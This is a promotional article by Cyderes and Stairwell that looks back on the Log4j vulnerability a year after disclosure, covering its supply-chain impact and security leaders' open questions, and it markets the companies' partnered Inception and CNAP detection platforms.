Article contributed by Cody C. of Cyderes’ Special Operations team and Alex Hegyi, Threat Hunter at Stairwell
A year ago this month, the Apache Software Foundation reported the Log4j vulnerability — and the impact was widely and immediately felt. Within 24 hours of the announcement, there were nearly 200,000 attempts to exploit the vulnerability. And within a week, that number grew to more than 1.2 million attacks.
Named after the open-source logging library that the vulnerability was originally discovered in, Log4j exposed a vast array of services and applications. From enterprise platforms to consumer programs alike, it is estimated that one in 10 corporate servers were exposed.
The Log4j vulnerability quickly became ubiquitous because it was so simple to compromise. An attacker only needed to log a single, strategically crafted string of code to exploit the vulnerability – and millions of services and devices could be affected.
Although there has been tremendous progress on patching since the initial disclosure, Log4j remains a lingering threat to organizations across the globe. In fact, Check Point Research reports that the Log4j vulnerability continued to impact 41% of organizations as of October 2022. Its impact on supply chains continues to be severe and we have every reason to believe that this exploit will be around for years to come.
The continued influence of Log4j on supply chain attacks
Log4j’s longevity is due to the ripple effect it has had on the software supply chain as a whole. While some companies may struggle to take inventory of all the software that’s used within their organization — creating a blind spot to supply chain attack exposure — the bigger issue stems from the fact that they don’t always have visibility into all the components of software they’re being sold.
By overlooking these details, it’s impossible to understand the risks through the software supply chain, how well the ‘long tail’ of patching has been implemented, which technologies are still exposed to these vulnerabilities, what variants have been created, and more.
Questions remain in the wake of the Log4j vulnerability
Given the ongoing nature of the vulnerability, security leaders remain uncertain of what to expect in the years to come. Some of their most pressing questions include:
- How has Log4j hurt our confidence in how we protect our organizations, and our cybersecurity practitioners and leaders?
- In the midst of an economic downturn, how do we justify the budget to show that we’re a cost-saving center of excellence, rather than just a cost center?
- How do we educate our non-cybersecurity leadership that it’s not an “if we get attacked” but a “when we get attacked” world?
- When the inevitable does happen, do we have a response plan in place to reduce the biggest cost of them all – the time that goes into finding, understanding, and remediating the event, given that the lag in response time is what costs organizations the most money?
How the Log4j vulnerability has inspired a surge of innovation
The ongoing threat from exploits such as Log4j were a critical driver behind the mid-2022 creation of a strategic partnership between managed detection and response pioneer Cyderes and Stairwell, developer of the first continuous intelligence, detection, and response platform, Inception.
Inception enables security teams to efficiently identify suspicious artifacts and malware that have evaded point-in-time security controls. The platform continuously analyzes an organization’s environment against the latest threat intelligence from multiple sources and exposes threats that would have otherwise remained undetected. When malware-led attacks are identified, Inception streamlines the triage, investigation, and remediation processes, and simultaneously enables the creation of tailored defenses that attackers can’t test against.
Partnering with Stairwell has allowed Cyderes to further optimize its proprietary Cloud Native Analytics Platform, or CNAP. Delivered as a true Security-as-a-Service offering, CNAP improves analytic effectiveness and overcomes long-standing hurdles of traditional Security Information and Event Management (SIEM) technology. With Inception directly integrated, security operations teams using CNAP are further empowered to outsmart attackers.
In the Log4j case, Cyderes performed threat research to better understand the attack, and used this knowledge to create rules for detection logic, perform threat hunts, and quickly respond when incident response was needed.
What lies ahead?
The Stairwell-Cyderes team continues to deliver expanded visibility into malicious activity that traditional point-in-time defenses miss and empowers our mutual customers with tailor-made defenses that attackers can’t evade.
Solutions like Inception, which didn’t exist when the Log4j exploits first appeared, can help with querying an organization’s entire environment at Google-like speeds. Whether the security team is looking for malicious software, a previously unknown supply chain vulnerability, or even admin credentials in script files, the Inception platform can return results from a search across an organization in seconds to minutes.
The mission of the Cyderes-Stairwell partnership continues to evolve as we address new customer challenges and stay ahead of advanced cyber attacks even beyond Log4j. Take the burgeoning threat from ransomware, for example. While data destruction had been rumored for some time to be where ransomware was headed, no one had seen it in the wild. During a recent incident response, however, Cyderes and Stairwell discovered signs that threat actors were actively in the process of staging and developing this capability, a significant development that received extensive global attention and media coverage.
As cyber threats grow at unprecedented rates, enterprises need the ability to detect and respond to suspicious activity at warp speed. By integrating Cyderes’ proprietary CNAP platform with Inception, we are adding critical capabilities to our service, so that our clients can rest assured their systems are not compromised when the inevitable happens.
For more cybersecurity tips, follow Cyderes on LinkedIn and Twitter.
Take the first step in transforming your cybersecurity program with Cyderes and Stairwell
Cyderes’ world-class capabilities of managed detection and response solutions for the modern enterprise integrate seamlessly with Stairwell’s flagship Inception platform, providing an innovative and truly ground-breaking solution that empowers organizations to stay a step ahead of threat actors. Connect with our team today to learn how we can help you take your security program to the next level.